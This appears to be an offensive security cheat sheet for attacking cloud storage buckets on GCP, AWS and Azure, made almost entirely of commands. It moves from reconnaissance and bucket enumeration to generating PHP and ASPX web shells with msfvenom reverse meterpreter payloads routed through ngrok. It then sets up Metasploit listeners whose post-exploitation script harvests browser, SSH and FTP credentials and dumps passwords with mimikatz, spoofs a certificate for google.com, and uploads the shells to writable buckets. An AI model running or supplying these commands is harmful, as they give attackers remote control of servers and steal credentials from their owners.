Check List
Cheat Sheet
WHOIS Lookup
Domain to IP
Company Info
IP to ASN
whois -h whois.cymru.com -v $TARGET
HTTP Headers
Check Robots
curl $WEBSITE/robots.txt
DNS Enum
DNS Records
Subdomain Enum
Subdomains
echo "1.1.1.1" > /tmp/resolvers.txt; \
subfinder -d $WEBSITE -all | \
shuffledns -d $WEBSITE -r /tmp/resolvers.txt -mode resolve
Source URLs
GCP
katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+storage\.googleapis\.com[^ ]*"
AWS
katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+s3[^ ]+\.amazonaws\.com"
Azure
katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+\.blob\.core\.windows\.net[^ ]*"
Certificate Transparency
curl -s "https://crt.sh/?q=%25.$WEBSITE&output=json" | jq .
GCP
echo $WEBSITE | gau | grep -E "storage\.googleapis\.com|.*\.storage.googleapis.com"
AWS
echo $WEBSITE | gau | grep -E "s3\.[a-z0-9-]+\.amazonaws\.com|s3\.amazonaws\.com"
Azure
echo $WEBSITE | gau | grep -E "[a-z0-9-]+\.blob\.core\.windows\.net"
GCP
nmap -p 80,443 \
--script http-title,http-headers $BUCKET.storage.googleapis.com
AWS
nmap -p 80,443 \
--script http-title,s3open $BUCKET.s3.amazonaws.com
Azure
nmap -p 80,443 \
--script http-title,azure-enum $CONTAINER.blob.core.windows.net
nuclei -u $WEBSITE \
-tags aws gcp azure cloud cloud-Enum aws-cloud-config azure-cloud-config
Open Source Intelligence
site:$WEBSITE inurl:"storage.googleapis.com" |
site:$WEBSITE inurl:"googleusercontent.com"
site:$WEBSITE inurl:"amazonaws.com" |
site:s3.amazonaws.com $WEBSITE
site:$WEBSITE inurl:"blob.core.windows.net" |
site:blob.core.windows.net $WEBSITE
shodan search net:"$TARGET/24"
services.http.response.body: {"s3.amazonaws.com", "storage.googleapis.com", "blob.core.windows.net"}
GCP
wget https://raw.githubusercontent.com/RhinoSecurityLabs/GCPBucketBrute/refs/heads/master/permutations.txt \
-O /tmp/gcp_buckets.txt
cloudbrute discover \
-d $WEBSITE \
-k "gcp" \
-w /tmp/gcp_buckets.txt
AWS
wget https://raw.githubusercontent.com/koaj/aws-s3-bucket-wordlist/refs/heads/master/list.txt \
-O /tmp/s3_bucket_list.txt
cloudbrute discover \
-d $WEBSITE \
-k "s3" \
-w /tmp/s3_bucket_list.txt
Azure
wget https://raw.githubusercontent.com/Macmod/goblob/refs/heads/main/wordlists/goblob-folder-names.txt \
-O /tmp/AzureBlob.txt
cloudbrute discover \
-d $WEBSITE \
-k "azure" \
-w /tmp/AzureBlob.txt
nmap -p 80,443 \
--script http-title,http-open-proxy,ssl-cert,http-enum,http-robots.txt,http-auth-finder,s3-buckets,s3-ls,s3-object,s3-enum,s3-brute \
$CONTAINER.blob.core.windows.net \
$BUCKET.storage.googleapis.com \
$BUCKET.s3.amazonaws.com
Remote Code Execution
Create Web Shell PHP
weevely generate 00980098 /tmp/unk9vvn.php
Create Web Shell ASPX
cp /usr/share/webshells/aspx/cmdasp.aspx /tmp/unk9vvn.aspx
Start Ngrok
ngrok tcp 4444 >/dev/null 2>&1 &
Define ENV Ngrok
NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')
Cert Spoof
rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"
Post-EXP
cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF
Generate Web shell PHP
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=$NGHOST \
PORT=$NGPORT \
EnableStageEncoding=true \
-f raw \
-e php/base64 \
-i 3 \
-o /tmp/unk9vvn.php
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php
Generate Web Shell ASP
msfvenom -p windows/meterpreter/reverse_winhttps \
LHOST=$NGHOST \
PORT=$NGPORT \
EnableStageEncoding=true \
-f asp > /tmp/unk9vvn.aspx
Listening Metasploit PHP
msfconsole -qx "
use multi/handler;
set PAYLOAD php/meterpreter/reverse_tcp;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
Listening Metasploit ASP
msfconsole -qx "
use multi/handler;
set PAYLOAD windows/meterpreter/reverse_winhttps;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
Connection Test
aws s3 ls s3://$BUCKET.s3.amazonaws.com --no-sign-request
Upload File Testing
aws s3 cp /tmp/unk9vvn.php s3://$BUCKET.s3.amazonaws.com --no-sign-request
Success Upload File Testing
aws s3 cp s3://$BUCKET.s3.amazonaws.com/unk9vvn.php . --no-sign-request
HTTP Connection Testing
curl -I https://$BUCKET.s3.amazonaws.com/unk9vvn.php
Connection Test
gsutil ls gs://$BUCKET
Upload File Testing
gsutil cp /tmp/unk9vvn.php gs://$BUCKET
Success Upload File Testing
gsutil cp gs://$BUCKET/unk9vvn.php .
HTTP Connection Testing
curl -I http://storage.googleapis.com/$BUCKET/unk9vvn.php
Connection Test
az storage blob list \
--account-name $ACCOUNT \
--container-name $CONTAINER \
--output table
Upload File Testing
az storage blob upload \
--account-name $ACCOUNT \
--container-name $CONTAINER \
--name unk9vvn.aspx \
--file /tmp/unk9vvn.aspx \
--auth-mode login
Success Upload File Testing
az storage blob download \
--account-name $ACCOUNT \
--container-name $CONTAINER \
--name unk9vvn.aspx \
--file /tmp/test_unk9vvn.aspx \
--auth-mode login
HTTP Connection Testing
curl -I https://$ACCOUNT.blob.core.windows.net/$CONTAINER/unk9vvn.aspx